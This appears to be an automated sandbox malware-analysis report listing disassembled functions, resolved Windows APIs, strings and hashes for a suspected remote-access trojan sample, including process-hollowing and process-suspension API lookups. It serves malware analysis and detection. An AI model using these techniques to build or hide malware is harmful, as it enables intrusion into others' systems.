GetLastError.KERNEL32(?,00CCF6A6,00000000,00000000,00CC9CE0,?,?,00000000,00000000,00000001,00000000,00000000,?,00CC9CE0,00000000,00000104), ref: 00CC9C04
__dosmaperr.LIBCMT ref: 00CC9C0B

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 4588b631e6e88e7301b6abe47dd295d059a15f4605061547dd0f704ce884ff1c
Instruction ID: d621ce72b4515d75933b1d2ae03cc5073bae6c05d8568f745a9a6e554fbdcdf2
Opcode Fuzzy Hash: 4588b631e6e88e7301b6abe47dd295d059a15f4605061547dd0f704ce884ff1c
Instruction Fuzzy Hash: BEF06932200616BB8B206BA2CC08F6ABFA9FF443A03008529F429D6520D731E861DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00CC9B7B Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,00CC9CE0,00000000,?,00CCF71B,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 00CC9B91
GetLastError.KERNEL32(?,00CCF71B,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,00CC9CE0,00000000,00000104,?), ref: 00CC9B9B
__dosmaperr.LIBCMT ref: 00CC9BA2

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 63def3506bfed7f5344958751af060e507dd069cedc021487a4d15cecbffd7dc
Instruction ID: 3df819d765015c38f492acc22c08c878e7a2678d7f7066068de2ab842ce8e320
Opcode Fuzzy Hash: 63def3506bfed7f5344958751af060e507dd069cedc021487a4d15cecbffd7dc
Instruction Fuzzy Hash: B2F03C32600515BB8B206FA2EC0CF5ABFA9FF483A03048559F52ED6520D731ED61DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00CD3DAF Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00CB48D0,777D6490,00CE17E8,00000000,00CB48D0,?,00CD3407,00CB48D0,00000001,00CB48D0,00CB48D0,?,00CCEEDE,00000000,?,00CB48D0), ref: 00CD3DC6
GetLastError.KERNEL32(?,00CD3407,00CB48D0,00000001,00CB48D0,00CB48D0,?,00CCEEDE,00000000,?,00CB48D0,00000000,00CB48D0,?,00CCF432,00CB48D0), ref: 00CD3DD2

Part of subcall function 00CD3D98: CloseHandle.KERNEL32(FFFFFFFE,00CD3DE2,?,00CD3407,00CB48D0,00000001,00CB48D0,00CB48D0,?,00CCEEDE,00000000,?,00CB48D0,00000000,00CB48D0), ref: 00CD3DA8

___initconout.LIBCMT ref: 00CD3DE2

Part of subcall function 00CD3D5A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00CD3D89,00CD33F4,00CB48D0,?,00CCEEDE,00000000,?,00CB48D0,00000000), ref: 00CD3D6D

WriteConsoleW.KERNEL32(00CB48D0,777D6490,00CE17E8,00000000,?,00CD3407,00CB48D0,00000001,00CB48D0,00CB48D0,?,00CCEEDE,00000000,?,00CB48D0,00000000), ref: 00CD3DF7

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: defc4f51f8777ae306f9f83015c490b59974d615af36779577a16d62f85d3490
Instruction ID: 0a725f557f8091cb3250c736169271bf7ca53c248fcb988dcf5195326c9fedbc
Opcode Fuzzy Hash: defc4f51f8777ae306f9f83015c490b59974d615af36779577a16d62f85d3490
Instruction Fuzzy Hash: 2CF01C360111D8BBCF222F95DC09B8D3F67FB083A1B044011FA1986230C732AA64AFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00CC25A1 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,00CC253E,00000064), ref: 00CC25C4
LeaveCriticalSection.KERNEL32(00CE4738,?,?,00CC253E,00000064), ref: 00CC25CE
WaitForSingleObjectEx.KERNEL32(?,00000000,?,00CC253E,00000064), ref: 00CC25DF
EnterCriticalSection.KERNEL32(00CE4738,?,00CC253E,00000064), ref: 00CC25E6

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: 6294d96feba7b35b72868e64858a432bd806f3687828e5569670341ec3abe93f
Instruction ID: a689cb32da5c60e0e51795b655722013b19bfa72eae7b1b1cf2bae8ef0ca4dee
Opcode Fuzzy Hash: 6294d96feba7b35b72868e64858a432bd806f3687828e5569670341ec3abe93f
Instruction Fuzzy Hash: 35E04835943164F7CB051B53EC09F9E3F69EF1A752F014026F5055A160C7755940DBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00CC7BC1 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00CC7BCA

Part of subcall function 00CC8951: HeapFree.KERNEL32(00000000,00000000,?,00CCD362,00000000,00000000,00000000,E800CE41,?,00CCD389,00000000,00000007,00000000,?,00CCD78B,00000000), ref: 00CC8967
Part of subcall function 00CC8951: GetLastError.KERNEL32(00000000,?,00CCD362,00000000,00000000,00000000,E800CE41,?,00CCD389,00000000,00000007,00000000,?,00CCD78B,00000000,00000000), ref: 00CC8979

_free.LIBCMT ref: 00CC7BDD
_free.LIBCMT ref: 00CC7BEE
_free.LIBCMT ref: 00CC7BFF

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 84f6a29b9f3b5d75e04400290c81b486be7e2cdd44fffa74bab1002d6f2006fb
Instruction ID: 61364ed3c3bb48ae063cd6cde11121979403e16f87bc24a1d2931dc027e6499e
Opcode Fuzzy Hash: 84f6a29b9f3b5d75e04400290c81b486be7e2cdd44fffa74bab1002d6f2006fb
Instruction Fuzzy Hash: 58E04679809AA0AB8B022F64FCC1B1E3BB1A708714322090EF6000B231CF314052BF86

Uniqueness

Uniqueness Score: -1.00%

Function 00CB5760 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,7782F990,?,00000000), ref: 00CB577D

Strings

Mq==, xrefs: 00CB57D7
ANLx9WEo4vQy, xrefs: 00CB5DC8

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID: ANLx9WEo4vQy$Mq==
API String ID: 514040917-2396399242
Opcode ID: 19ba9e12ac29874d62856924f044c0ab10be68b0f586f10ac180f81fe25476e5
Instruction ID: a926918056c992fa67137817cf3e9c3d838376ebd22a5601860a69f401def171
Opcode Fuzzy Hash: 19ba9e12ac29874d62856924f044c0ab10be68b0f586f10ac180f81fe25476e5
Instruction Fuzzy Hash: 2B710871E002099FDF08DF68D885BEEBB76EF85310F64416CE405A72D6DB359E868B90

Uniqueness

Uniqueness Score: -1.00%

Function 00CC7230 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\yaALNupJCH.exe, xrefs: 00CC7273, 00CC727A, 00CC72B0

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\yaALNupJCH.exe
API String ID: 0-3763621502
Opcode ID: 13ee9afd6b3d1ae640625b0be2cbc62f51d6d9a31def8ef3db07a131a389a726
Instruction ID: 63c44a76c870b285ff82ba14cb971baec7bbe68a27f7d049fd8d856abaeebca5
Opcode Fuzzy Hash: 13ee9afd6b3d1ae640625b0be2cbc62f51d6d9a31def8ef3db07a131a389a726
Instruction Fuzzy Hash: 17416271A08254EBCB25DF9ADC81FAEBBF8EB85310B24026EF81497251D7709A41EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00CBF134 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00CBF1C1

Strings

Otu=, xrefs: 00CBF162
853321935212, xrefs: 00CBF175

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID: 853321935212$Otu=
API String ID: 514040917-3849146471
Opcode ID: 207e304b5faf79f934b8e4c72b7cab8633736dbd3047e35ff3be0c86570b17c3
Instruction ID: 7a87ccb779b7e940405636470b76d0ee8dac5b52332256a91049c671f6339d45
Opcode Fuzzy Hash: 207e304b5faf79f934b8e4c72b7cab8633736dbd3047e35ff3be0c86570b17c3
Instruction Fuzzy Hash: AE11E674A0028467CF54BF35C817BED3A689B02794F48059DFC4243653DF769B4996D3

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: yaALNupJCH.exePID: 7536, Parent PID: 7428COMMON

Execution Graph

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.6%
Total number of Nodes:	1369
Total number of Limit Nodes:	47

Executed Functions

Function 0041CA9E Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E92F), ref: 0041CAB3
GetProcAddress.KERNEL32(00000000), ref: 0041CABC
GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E92F), ref: 0041CAD3
GetProcAddress.KERNEL32(00000000), ref: 0041CAD6
LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E92F), ref: 0041CAE8
GetProcAddress.KERNEL32(00000000), ref: 0041CAEB
LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E92F), ref: 0041CAFC
GetProcAddress.KERNEL32(00000000), ref: 0041CAFF
LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E92F), ref: 0041CB11
GetProcAddress.KERNEL32(00000000), ref: 0041CB14
LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E92F), ref: 0041CB20
GetProcAddress.KERNEL32(00000000), ref: 0041CB23
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E92F), ref: 0041CB34
GetProcAddress.KERNEL32(00000000), ref: 0041CB37
GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E92F), ref: 0041CB48
GetProcAddress.KERNEL32(00000000), ref: 0041CB4B
LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E92F), ref: 0041CB5C
GetProcAddress.KERNEL32(00000000), ref: 0041CB5F
GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E92F), ref: 0041CB70
GetProcAddress.KERNEL32(00000000), ref: 0041CB73
GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E92F), ref: 0041CB84
GetProcAddress.KERNEL32(00000000), ref: 0041CB87
GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E92F), ref: 0041CB98
GetProcAddress.KERNEL32(00000000), ref: 0041CB9B
GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E92F), ref: 0041CBAC
GetProcAddress.KERNEL32(00000000), ref: 0041CBAF
GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E92F), ref: 0041CBC0
GetProcAddress.KERNEL32(00000000), ref: 0041CBC3
LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E92F), ref: 0041CBD1
GetProcAddress.KERNEL32(00000000), ref: 0041CBD4
LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E92F), ref: 0041CBE5
GetProcAddress.KERNEL32(00000000), ref: 0041CBE8
GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E92F), ref: 0041CBF5
GetProcAddress.KERNEL32(00000000), ref: 0041CBF8
GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E92F), ref: 0041CC05
GetProcAddress.KERNEL32(00000000), ref: 0041CC08
LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E92F), ref: 0041CC1A
GetProcAddress.KERNEL32(00000000), ref: 0041CC1D
LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E92F), ref: 0041CC2A
GetProcAddress.KERNEL32(00000000), ref: 0041CC2D
GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E92F), ref: 0041CC3E
GetProcAddress.KERNEL32(00000000), ref: 0041CC41
GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E92F), ref: 0041CC52
GetProcAddress.KERNEL32(00000000), ref: 0041CC55
LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040E92F), ref: 0041CC67
GetProcAddress.KERNEL32(00000000), ref: 0041CC6A
LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E92F), ref: 0041CC77
GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E92F), ref: 0041CC87
GetProcAddress.KERNEL32(00000000), ref: 0041CC8A
LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E92F), ref: 0041CC97
GetProcAddress.KERNEL32(00000000), ref: 0041CC9A

Strings

GetProcessImageFileNameW, xrefs: 0041CAA8, 0041CAAD, 0041CACD
EnumDisplayMonitors, xrefs: 0041CB89
RmStartSession, xrefs: 0041CC57
Iphlpapi, xrefs: 0041CC0F, 0041CC19, 0041CC24
Kernel32, xrefs: 0041CACE
NtUnmapViewOfSection, xrefs: 0041CB06
GetExtendedUdpTable, xrefs: 0041CC1F
shcore, xrefs: 0041CAE3
Psapi, xrefs: 0041CAAE
EnumDisplayDevicesW, xrefs: 0041CB75
ntdll, xrefs: 0041CB0B, 0041CB10, 0041CBEF, 0041CBFF, 0041CC34
GetMonitorInfoW, xrefs: 0041CB9D
IsUserAnAdmin, xrefs: 0041CB4D
Shell32, xrefs: 0041CB52
GlobalMemoryStatusEx, xrefs: 0041CB16
kernel32, xrefs: 0041CB1B, 0041CB2A, 0041CB3E, 0041CB66, 0041CBB6, 0041CBDB, 0041CC48
GetExtendedTcpTable, xrefs: 0041CC0A
GetConsoleWindow, xrefs: 0041CBD6
user32, xrefs: 0041CAF7, 0041CB7A, 0041CB8E, 0041CBA2
GetComputerNameExW, xrefs: 0041CB39
SetProcessDpiAwareness, xrefs: 0041CADD, 0041CAE2, 0041CAF6
SetProcessDEPPolicy, xrefs: 0041CB61
RmRegisterResources, xrefs: 0041CC6C
RmGetList, xrefs: 0041CC7C
RmEndSession, xrefs: 0041CC8C
Shlwapi, xrefs: 0041CBC7
NtResumeProcess, xrefs: 0041CBFA
Rstrtmgr, xrefs: 0041CC5C, 0041CC66, 0041CC71, 0041CC81, 0041CC91
IsWow64Process, xrefs: 0041CB25
NtSuspendProcess, xrefs: 0041CBEA
GetFinalPathNameByHandleW, xrefs: 0041CC43
NtQueryInformationProcess, xrefs: 0041CC2F
GetSystemTimes, xrefs: 0041CBB1

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$HandleModule
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
API String ID: 4236061018-3687161714
Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
Instruction ID: 2b824bf11641892101ffcf30fc9d4a2e3bc4459fb66bd3e79e5053c137ea286e
Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
Instruction Fuzzy Hash: A741BEA0EC035879DA10BBB66CCDE3B3E5CD9857953214837B15CA3150EBBCD8408EAE

Uniqueness

Uniqueness Score: -1.00%

Function 0040F6F5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00413497: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004134B7
Part of subcall function 00413497: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 004134D5
Part of subcall function 00413497: RegCloseKey.KERNEL32(?), ref: 004134E0

Sleep.KERNEL32(00000BB8), ref: 0040F7A9
ExitProcess.KERNEL32 ref: 0040F818

Strings

pth_unenc, xrefs: 0040F70B, 0040F752, 0040F7BF
4.9.2 Pro, xrefs: 0040F784, 0040F7F1
override, xrefs: 0040F71A

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: 4.9.2 Pro$override$pth_unenc
API String ID: 2281282204-2269537927
Opcode ID: 985771a873a95799bcc2eac2c82e6424fc8be46f8441abce2765580d4795feb4
Instruction ID: 52d9c995ea664f7604ce00e7e8ce505d170626c6ddf5349e6a99aaaa1312c2d2
Opcode Fuzzy Hash: 985771a873a95799bcc2eac2c82e6424fc8be46f8441abce2765580d4795feb4
Instruction Fuzzy Hash: 6C210271B0430167C614BA7A8C5BAAE39999B81718F50003FF40A676D7EF7C8E0483AF

Uniqueness

Uniqueness Score: -1.00%

Function 0040F81F Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,0041544A,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,4.9.2 Pro), ref: 0040F833

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1

Uniqueness

Uniqueness Score: -1.00%

Function 00434A95 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00034AA1,004347C8), ref: 00434A9A

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 14e8cb0cbb81bd441872974e3896e3a58f7002f9ff1e7d34040d74437857d637
Instruction ID: bededb24876f54f8b14d1792734d10542b4b71307cd25d94af771e4df3ea9f72
Opcode Fuzzy Hash: 14e8cb0cbb81bd441872974e3896e3a58f7002f9ff1e7d34040d74437857d637
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0040E913 Relevance: 88.3, APIs: 15, Strings: 35, Instructions: 795
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041CA9E: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E92F), ref: 0041CAB3
Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000), ref: 0041CABC
Part of subcall function 0041CA9E: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E92F), ref: 0041CAD3
Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000), ref: 0041CAD6
Part of subcall function 0041CA9E: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E92F), ref: 0041CAE8
Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000), ref: 0041CAEB
Part of subcall function 0041CA9E: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E92F), ref: 0041CAFC
Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000), ref: 0041CAFF
Part of subcall function 0041CA9E: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E92F), ref: 0041CB11
Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000), ref: 0041CB14
Part of subcall function 0041CA9E: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E92F), ref: 0041CB20
Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000), ref: 0041CB23
Part of subcall function 0041CA9E: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E92F), ref: 0041CB34
Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000), ref: 0041CB37
Part of subcall function 0041CA9E: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E92F), ref: 0041CB48
Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000), ref: 0041CB4B
Part of subcall function 0041CA9E: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E92F), ref: 0041CB5C
Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000), ref: 0041CB5F
Part of subcall function 0041CA9E: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E92F), ref: 0041CB70
Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000), ref: 0041CB73
Part of subcall function 0041CA9E: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E92F), ref: 0041CB84
Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000), ref: 0041CB87
Part of subcall function 0041CA9E: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E92F), ref: 0041CB98
Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000), ref: 0041CB9B
Part of subcall function 0041CA9E: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E92F), ref: 0041CBAC
Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000), ref: 0041CBAF
